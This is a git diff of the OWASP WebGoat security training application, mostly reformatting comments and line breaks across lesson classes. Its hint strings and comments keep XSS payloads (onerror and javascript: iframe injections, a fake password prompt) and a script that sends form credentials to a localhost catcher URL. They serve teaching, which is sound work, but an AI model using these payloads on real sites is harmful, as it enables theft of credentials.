" + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page. " + "Verify that 'Jerry' is affected by the attack. " + "A sample JavaScript snippet you can use is: <SCRIPT>alert('bang!');</SCRIPT>."; @@ -186,28 +186,28 @@ public class DBCrossSiteScripting extends GoatHillsFinancial } } catch (ParameterNotFoundException pnfe) { - //System.out.println("Missing parameter"); + // System.out.println("Missing parameter"); pnfe.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (ValidationException ve) { - //System.out.println("Validation failed"); + // System.out.println("Validation failed"); ve.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } catch (UnauthenticatedException ue) { s.setMessage("Login failed"); - //System.out.println("Authentication failure"); + // System.out.println("Authentication failure"); ue.printStackTrace(); } catch (UnauthorizedException ue2) { s.setMessage("You are not authorized to perform this function"); - //System.out.println("Authorization failure"); + // System.out.println("Authorization failure"); ue2.printStackTrace(); } catch (Exception e) { // All other errors send the user to the generic error page - //System.out.println("handleRequest() error"); + // System.out.println("handleRequest() error"); e.printStackTrace(); setCurrentAction(s, ERROR_ACTION); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java index 58ea7f458..d9e3a4f07 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/UpdateProfile.java 
@@ -129,11 +129,11 @@ public class UpdateProfile extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java
index 620c74cd1..890b06c6d 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/DBSQLInjection.java
@@ -187,28 +187,28 @@ public class DBSQLInjection extends GoatHillsFinancial
 setCurrentAction(s, ERROR_ACTION);
 } catch (ParameterNotFoundException pnfe)
 {
- //System.out.println("Missing parameter");
+ // System.out.println("Missing parameter");
 pnfe.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (ValidationException ve)
 {
- //System.out.println("Validation failed");
+ // System.out.println("Validation failed");
 ve.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (UnauthenticatedException ue)
 {
 s.setMessage("Login failed");
- //System.out.println("Authentication failure");
+ // System.out.println("Authentication failure");
 ue.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
 s.setMessage("You are not authorized to perform this function");
- //System.out.println("Authorization failure");
+ // System.out.println("Authorization failure");
 ue2.printStackTrace();
 } catch (Exception e)
 {
 // All other errors send the user to the generic error page
- //System.out.println("handleRequest() error");
+ // System.out.println("handleRequest() error");
 e.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java
index 5644c59ec..6816a9e5e 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java
@@ -82,11 +82,11 @@ public class Login extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java
index 08d469d90..3332717dd 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java
@@ -61,11 +61,11 @@ public class DOMInjection extends LessonAdapter .setBorder(0).setHspace(0).setVspace(0); private final static String key = "K1JFWP8BSO8HI52LNPQS8F5L01N"; - + public void handleRequest(WebSession s) { try - { + { String userKey = s.getParser().getRawParameter(KEY, ""); String fromAJAX = s.getParser().getRawParameter("from", ""); if (fromAJAX.equalsIgnoreCase("ajax") && userKey.length() != 0 && userKey.equals(key))
@@ -74,11 +74,10 @@ public class DOMInjection extends LessonAdapter s.getResponse().setHeader("Cache-Control", "no-cache"); PrintWriter out = new PrintWriter(s.getResponse().getOutputStream()); - out.print("document.forms[0].SUBMIT.disabled = false;"); out.flush(); out.close(); - return ; + return; } } catch (Exception e)
@@ -91,21 +90,19 @@ public class DOMInjection extends LessonAdapter setContent(form); } + protected Element createContent(WebSession s) { - ElementContainer ec = new ElementContainer(); - if (s.getRequest().getMethod().equalsIgnoreCase("POST") ) + if (s.getRequest().getMethod().equalsIgnoreCase("POST")) { makeSuccess(s); } String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; + + " messageDiv.innerHTML = 'Correct licence Key.' " + lineSep + " }" + lineSep + + " catch(err)" + lineSep + " { " + lineSep + " messageDiv.innerHTML = 'Wrong license key.'" + + lineSep + "} " + lineSep + " }}}" + lineSep + "" + lineSep; ec.addElement(new StringElement(script)); ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Registration Page:"))); @@ -147,7 +139,6 @@ public class DOMInjection extends LessonAdapter t1.addElement(tr); - tr = new TR(); Input b = new Input(); b.setType(Input.SUBMIT); diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java index 3c5f7dc35..15bc94ed6 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java 
@@ -183,13 +183,16 @@ public class DOMXSS extends SequentialLessonAdapter hints.add("Stage 2: Try entering the following: " + "<img src=x onerror=;;alert('XSS') />"); - hints.add("Stage 3: Try entering the following: " + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"); + hints.add("Stage 3: Try entering the following: " + + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"); - hints.add("Stage 4: Try entering the following: " + hints + .add("Stage 4: Try entering the following: " + "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button " + "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>"); - hints.add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version)."); + hints + .add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version)."); // Attack Strings: // @@ -201,7 +204,8 @@ public class DOMXSS extends SequentialLessonAdapter // Please enter your password:
















+ // pass.value); + // ">Submit















 return hints;
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
index 6e06af542..02ea116d0 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
@@ -4,7 +4,6 @@ package org.owasp.webgoat.lessons;
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -88,7 +87,7 @@ public class DangerousEval extends LessonAdapter
 // FIXME: encode output of field2, then s.setMessage( field2 );
 ec.addElement("");
- //
+ //
 ec.addElement(new HR().setWidth("90%"));
 ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
 Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
@@ -203,7 +202,7 @@ public class DangerousEval extends LessonAdapter
 ec.addElement(t);
 ec.addElement(new BR());
 ec.addElement(new HR().setWidth("90%"));
-
+
 } catch (Exception e)
 {
 s.setMessage("Error generating " + this.getClass().getName());
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
index b65910af8..509c44ef7 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/DeleteProfile.java
@@ -66,11 +66,11 @@ public class DeleteProfile extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
index 618f120a3..5de476081 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java
@@ -95,8 +95,8 @@ public class EditProfile extends DefaultLessonAction
 .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 .getString("disciplined_notes"), answer_results.getString("personal_description"));
 /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
- * profile.getLastName() + " (" + profile.getId() + ")");
+ * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
+ * " " + profile.getLastName() + " (" + profile.getId() + ")");
 */}
 } catch (SQLException sqle)
 {
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
index f2384907f..443829279 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java
@@ -69,11 +69,11 @@ public class FindProfile extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
@@ -139,8 +139,8 @@ public class FindProfile extends DefaultLessonAction
 .getString("disciplined_notes"), answer_results.getString("personal_description"));
 /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
- * profile.getLastName() + " (" + profile.getId() + ")");
+ * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
+ * " " + profile.getLastName() + " (" + profile.getId() + ")");
 */
 setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id));
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
index 4210cc839..0a006fec0 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/GoatHillsFinancial.java
@@ -220,29 +220,29 @@ public class GoatHillsFinancial extends RandomLessonAdapter
 }
 } catch (ParameterNotFoundException pnfe)
 {
- //System.out.println("Missing parameter");
+ // System.out.println("Missing parameter");
 pnfe.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (ValidationException ve)
 {
- //System.out.println("Validation failed");
+ // System.out.println("Validation failed");
 ve.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (UnauthenticatedException ue)
 {
 s.setMessage("Login failed");
- //System.out.println("Authentication failure");
+ // System.out.println("Authentication failure");
 ue.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
 s.setMessage("You are not authorized to perform this function");
- //System.out.println("Authorization failure");
+ // System.out.println("Authorization failure");
 setCurrentAction(s, ERROR_ACTION);
 ue2.printStackTrace();
 } catch (Exception e)
 {
 // All other errors send the user to the generic error page
- //System.out.println("handleRequest() error");
+ // System.out.println("handleRequest() error");
 e.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
index 2eb89d8dc..76ade85d5 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
@@ -75,11 +75,11 @@ public class Login extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
index 7d877a902..cd20d6665 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
@@ -58,11 +58,11 @@ public class Logout extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
index 740f68722..3760aa5f1 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
@@ -94,11 +94,11 @@ public class UpdateProfile extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
index 9a79405db..d217f5f43 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
@@ -104,8 +104,8 @@ public class ViewProfile extends DefaultLessonAction
 .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 .getString("disciplined_notes"), answer_results.getString("personal_description"));
 /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
- * profile.getLastName() + " (" + profile.getId() + ")");
+ * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
+ * " " + profile.getLastName() + " (" + profile.getId() + ")");
 */}
 } catch (SQLException sqle)
 {
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
index a938c9b40..10ebb255a 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
@@ -68,7 +68,7 @@ public class HiddenFieldTampering extends LessonAdapter
 private final static String PRICE_TV_HACKED = "9.99";
 String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any
- // interesting exploit!
+ // interesting exploit!
 Pattern pattern1 = Pattern.compile(regex);
 String lineSep = System.getProperty("line.separator");
 String script = "

+ * XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user=" + * +document.forms[0].user.value + "&password=" + document.forms[0].pass.value + + * "";}
*
*
- *

This feature requires account login:

- *
+ *

This feature requires account login:


*
* Enter Username:
*
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java
index 11873247f..dd56eea5b 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RemoteAdminFlaw.java
@@ -85,7 +85,8 @@ public class RemoteAdminFlaw extends LessonAdapter
 List hints = new ArrayList();
 hints.add("WebGoat has 2 admin interfaces.");
 hints.add("WebGoat has one admin interface that is controlled via a URL parameter and is 'hackable'");
- hints.add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
+ hints
+ .add("WebGoat has one admin interface that is controlled via server side security constraints and should not be 'hackable'");
 hints.add("Follow the Source!");
 hints.add("On success you will see new submenu items in the menupoint 'Admin Functions'");
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
index a46a7a3d7..c560621e0 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/DeleteProfile.java
@@ -69,11 +69,11 @@ public class DeleteProfile extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java
index bbc25d502..279224eda 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/EditProfile.java
@@ -97,8 +97,8 @@ public class EditProfile extends DefaultLessonAction
 .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 .getString("disciplined_notes"), answer_results.getString("personal_description"));
 /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
- * profile.getLastName() + " (" + profile.getId() + ")");
+ * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
+ * " " + profile.getLastName() + " (" + profile.getId() + ")");
 */}
 } catch (SQLException sqle)
 {
@@ -145,8 +145,8 @@ public class EditProfile extends DefaultLessonAction
 .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 .getString("disciplined_notes"), answer_results.getString("personal_description"));
 /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
- * profile.getLastName() + " (" + profile.getId() + ")");
+ * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
+ * " " + profile.getLastName() + " (" + profile.getId() + ")");
 */}
 } catch (SQLException sqle)
 {
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
index 829437264..3b9247512 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/RoleBasedAccessControl.java
@@ -93,7 +93,6 @@ public class RoleBasedAccessControl extends GoatHillsFinancial return Category.ACCESS_CONTROL; } - /** * Gets the hints attribute of the DirectoryScreen object *
@@ -111,19 +110,16 @@ public class RoleBasedAccessControl extends GoatHillsFinancial hints.add("Stage1: How does the application know that the user selected the delete function?"); - - hints.add("Stage2: You have to code to check the authorization of the user for the action."); + hints.add("Stage2: You have to code to check the authorization of the user for the action."); // Stage 2 - - // Stage 3 hints.add("Stage3: How does the application know that the user selected any particular employee to view?"); - // Stage 4 - hints.add("Stage4: You have to code to check the authorization of the user for the action on a certain employee."); - + hints + .add("Stage4: You have to code to check the authorization of the user for the action on a certain employee."); + return hints; }
@@ -155,8 +151,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial } else if (STAGE2.equals(stage)) { - instructions ="Stage 2: Add Business Layer Access Control.

" + - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + instructions = "Stage 2: Add Business Layer Access Control.

" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + "Implement a fix to deny unauthorized access to the Delete function. " + "Repeat stage 1. Verify that access to Delete is properly denied.
" + "To do this you have to alter code."; @@ -168,8 +164,8 @@ public class RoleBasedAccessControl extends GoatHillsFinancial } else if (STAGE4.equals(stage)) { - instructions = "Stage 4: Add Data Layer Access Control.

" + - " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + instructions = "Stage 4: Add Data Layer Access Control.

" + + " THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

" + "Implement a fix to deny unauthorized access to this data. " + "Repeat stage 3. Verify that access to other employee's profiles is properly denied."; } @@ -177,21 +173,24 @@ public class RoleBasedAccessControl extends GoatHillsFinancial return instructions; } - - public String getLessonSolutionFileName(WebSession s) { + + public String getLessonSolutionFileName(WebSession s) + { String solutionFileName = null; String stage = getStage(s); solutionFileName = "/lesson_solutions/Lab Access Control/Lab " + stage + ".html"; return solutionFileName; } - + @Override - public String getSolution(WebSession s) { + public String getSolution(WebSession s) + { String src = null; try { - src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false); + src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), + false); } catch (IOException e) { s.setMessage("Could not find the solution file"); @@ -233,11 +232,9 @@ public class RoleBasedAccessControl extends GoatHillsFinancial } else { - //***************CODE HERE************************* - - - - //************************************************* + // ***************CODE HERE************************* + + // ************************************************* if (action.isAuthenticated(s)) { action.handleRequest(s); 
@@ -250,18 +247,18 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 setCurrentAction(s, ERROR_ACTION);
 } catch (ParameterNotFoundException pnfe)
 {
- //System.out.println("Missing parameter");
+ // System.out.println("Missing parameter");
 pnfe.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (ValidationException ve)
 {
- //System.out.println("Validation failed");
+ // System.out.println("Validation failed");
 ve.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (UnauthenticatedException ue)
 {
 s.setMessage("Login failed");
- //System.out.println("Authentication failure");
+ // System.out.println("Authentication failure");
 ue.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
@@ -306,13 +303,13 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 }
 }
- //System.out.println("Authorization failure");
+ // System.out.println("Authorization failure");
 setCurrentAction(s, ERROR_ACTION);
 ue2.printStackTrace();
 } catch (Exception e)
 {
 // All other errors send the user to the generic error page
- //System.out.println("handleRequest() error");
+ // System.out.println("handleRequest() error");
 e.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 }
@@ -377,18 +374,18 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 setCurrentAction(s, ERROR_ACTION);
 } catch (ParameterNotFoundException pnfe)
 {
- //System.out.println("Missing parameter");
+ // System.out.println("Missing parameter");
 pnfe.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (ValidationException ve)
 {
- //System.out.println("Validation failed");
+ // System.out.println("Validation failed");
 ve.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (UnauthenticatedException ue)
 {
 s.setMessage("Login failed");
- //System.out.println("Authentication failure");
+ // System.out.println("Authentication failure");
 ue.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
@@ -432,13 +429,13 @@ public class RoleBasedAccessControl extends GoatHillsFinancial
 }
 s.setMessage("You are not authorized to perform this function");
- //System.out.println("Authorization failure");
+ // System.out.println("Authorization failure");
 setCurrentAction(s, ERROR_ACTION);
 ue2.printStackTrace();
 } catch (Exception e)
 {
 // All other errors send the user to the generic error page
- //System.out.println("handleRequest() error");
+ // System.out.println("handleRequest() error");
 e.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
index 365a9fea1..70cba0845 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/UpdateProfile.java
@@ -98,11 +98,11 @@ public class UpdateProfile extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java
index 2476a83e0..cc048db12 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java
@@ -125,8 +125,8 @@ public class ViewProfile extends DefaultLessonAction
 .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 .getString("disciplined_notes"), answer_results.getString("personal_description"));
 /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
- * profile.getLastName() + " (" + profile.getId() + ")");
+ * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
+ * " " + profile.getLastName() + " (" + profile.getId() + ")");
 */}
 } catch (SQLException sqle)
 {
@@ -171,8 +171,8 @@ public class ViewProfile extends DefaultLessonAction
 .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 .getString("disciplined_notes"), answer_results.getString("personal_description"));
 /*
- * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
- * profile.getLastName() + " (" + profile.getId() + ")");
+ * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
+ * " " + profile.getLastName() + " (" + profile.getId() + ")");
 */}
 } catch (SQLException sqle)
 {
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java
index a3b139549..7d8193c27 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java
@@ -82,11 +82,11 @@ public class Login extends DefaultLessonAction
 chainedAction.handleRequest(s);
 } catch (UnauthenticatedException ue1)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue1.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
- //System.out.println("Internal server error");
+ // System.out.println("Internal server error");
 ue2.printStackTrace();
 }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
index 97debc15f..ffad7e4d9 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/SQLInjection.java
@@ -203,28 +203,28 @@ public class SQLInjection extends GoatHillsFinancial
 setCurrentAction(s, ERROR_ACTION);
 } catch (ParameterNotFoundException pnfe)
 {
- //System.out.println("Missing parameter");
+ // System.out.println("Missing parameter");
 pnfe.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (ValidationException ve)
 {
- //System.out.println("Validation failed");
+ // System.out.println("Validation failed");
 ve.printStackTrace();
 setCurrentAction(s, ERROR_ACTION);
 } catch (UnauthenticatedException ue)
 {
 s.setMessage("Login failed");
- //System.out.println("Authentication failure");
+ // System.out.println("Authentication failure");
 ue.printStackTrace();
 } catch (UnauthorizedException ue2)
 {
